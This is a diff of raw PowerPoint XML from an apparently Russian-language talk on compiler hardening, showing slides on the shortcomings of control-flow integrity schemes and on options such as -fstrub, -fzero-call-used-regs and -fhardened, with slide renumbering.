-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>alse positives:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Большое количество софта надо дорабатывать для LLVM CFI (всевозможные </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>reinterpret_cast</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>&lt;void *&gt;</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Например Clang не проходит проверки без фильтров</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>alse negatives:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>LLVM CFI:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Только несоответствия на уровне типов (хакер может вызвать неправильную функцию если типы совпадают)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Тяжелая интеграция (требует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LTO, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>проблемы с проверкой вызовов между границами </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>DSO)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Intel/AArch64</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>: вообще не проверяет типы</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не проверяются jump tables, сгенерированные для switch-конструкций (только в CET есть </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-mcet-switch</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>, дефолтно выключен)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -24013,7 +23982,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85FA2EA-CE39-4572-8964-10F663EEA649}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE66739-220D-4063-A90E-B4ABB2C41F03}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24031,7 +24000,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для включения защит</a:t>
+              <a:t>Недостатки</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -24039,10 +24008,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569A9BB4-7585-4ED0-8C45-A7DD7FF968A0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81B9927-05B7-49F1-9A4E-BB2CA8FF62E5}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24050,15 +24019,139 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Фрагментация: три несвязанных решения с разными, GCC не поддерживает LLVM CFI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>alse positives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Большое количество софта надо дорабатывать для LLVM CFI (всевозможные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>reinterpret_cast</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>&lt;void *&gt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Например Clang не проходит проверки без фильтров</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>alse negatives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>LLVM CFI:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Только несоответствия на уровне типов (хакер может вызвать неправильную функцию если типы совпадают)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Тяжелая интеграция (требует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проблемы с проверкой вызовов между границами </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>DSO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Intel/AArch64</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>: вообще не проверяет типы</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не проверяются jump tables, сгенерированные для switch-конструкций (только в CET есть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-mcet-switch</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, дефолтно выключен)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -24067,7 +24160,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE61DB-8198-4CE3-B6C0-E2E038BB0E39}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E4CD95D-A9E7-40EB-80DE-89B9691FA867}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24094,7 +24187,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="923193517"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74141188"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -24123,10 +24216,64 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85FA2EA-CE39-4572-8964-10F663EEA649}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для включения защит</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569A9BB4-7585-4ED0-8C45-A7DD7FF968A0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1278A8-A88F-4982-83DD-24E8A53A9EDD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE61DB-8198-4CE3-B6C0-E2E038BB0E39}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -24145,6 +24292,65 @@
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>72</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="923193517"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1278A8-A88F-4982-83DD-24E8A53A9EDD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>73</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -25396,7 +25602,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide73.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -25490,7 +25696,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>73</a:t>
+              <a:t>74</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -25509,7 +25715,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide74.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide75.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -28878,7 +29084,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>74</a:t>
+              <a:t>75</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -29081,7 +29287,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide75.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide76.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -30198,7 +30404,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>75</a:t>
+              <a:t>76</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -30265,7 +30471,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide76.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide77.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -30359,7 +30565,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>76</a:t>
+              <a:t>77</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -30378,7 +30584,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide77.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide78.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -31545,7 +31751,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>77</a:t>
+              <a:t>78</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -31555,496 +31761,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3460494525"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide78.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О чём мы не рассказали</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.):</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>tack scrubbing – очистка</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>стека при выходе из функции (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-fstrub</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Очистка регистров при выходе из функции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-fzero-call-used-regs</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для защиты от аппаратных атак </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Spectre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fhardened</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>– зонтичная</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>опция для наиболее важных защит</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>LLVM #122687</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включает все опции, рекомендованные </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Конкретный набор зависит от версии компилятора </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>есть </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>--help=hardened</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сейчас</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrivial</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
